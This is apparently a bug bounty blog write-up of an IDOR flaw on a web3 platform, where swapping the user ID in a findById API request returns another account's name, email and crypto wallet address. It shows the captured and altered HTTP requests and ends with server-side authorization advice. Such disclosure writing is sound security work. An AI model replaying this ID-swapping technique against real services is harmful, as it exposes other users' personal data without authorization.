Hii hunters Rs is here with my latest finding in one well known web3 bug bounty platform. I hope you find this helpful, if yes your welcome with Ideas and and appreciation.

Small request: If you spot any spelling or grammatical errors, please ignore them…

Let's get started!

Broken Object Level Authorization (IDOR) find byID endpoint Exposing sensitive PII.

Insecure Direct Object Reference (IDOR) is a common access control vulnerability where an application exposes internal object identifiers and fails to properly verify user authorization. By manipulating these identifiers, an attacker may gain unauthorized access to other users' data or perform actions outside their intended privilege scope.

This write-up demonstrates IDOR vulnerability Which is I find during my security testing in WEB3 Bug Bounty Platform. Here i explains the root cause, and provides a proof of concept showing how improper authorization validation can lead to sensitive data exposure.

None

Steps to Reproduce:

  1. Create two accounts: Account A: wegala1673@noidem.com Account B: xpwxxx@gmail.com
  2. Log in as Account A and capture the request to fetch account details: send it to repeater tab in burp suite.

Request Looks like:

GET /api/v1/client/user/findById/68b7ac4b17ecb8a068cc79a7 HTTP/2 Host: server.targetfinance.com User-Agent: Mozilla/5.0

> Replace the account ID in the request with Account B's ID

GET /api/v1/client/user/findById/68b7a7a117ecb8a068cc78b1 HTTP/2 Host: server.targetfinance.com User-Agent: Mozilla/5.0

None
My POC Screen Sort

> Send the manipulated request and show his response The response contains Account B's sensitive details (name, email, Crypto wallet address and many more personal details.) Looks like this:

None

> After Reporting 6 days later I get reply of triger:

None
Original Reply of triager

And sadly this is duplicate and I get 5 reputation points. But i get Lot's of motivation to do more hunting.

Final Thoughts:

This IDOR issue highlights the importance of enforcing authorization checks on the server side for every request, regardless of client-side restrictions. Applications should validate object ownership, implement role-based access control, and avoid relying on predictable identifiers.

I hope you like This Real POC in this Ai generated Blogs era.

Don't forget to follow me and leave a clap and your lovable comments.(You can do it Many times!)

Next, We met with a more interesting topic.

Thanks for reading….

#bugbounty #IDOR #web3 #Bugbounty #Cybersecurity #EasyIDOR #PIILeak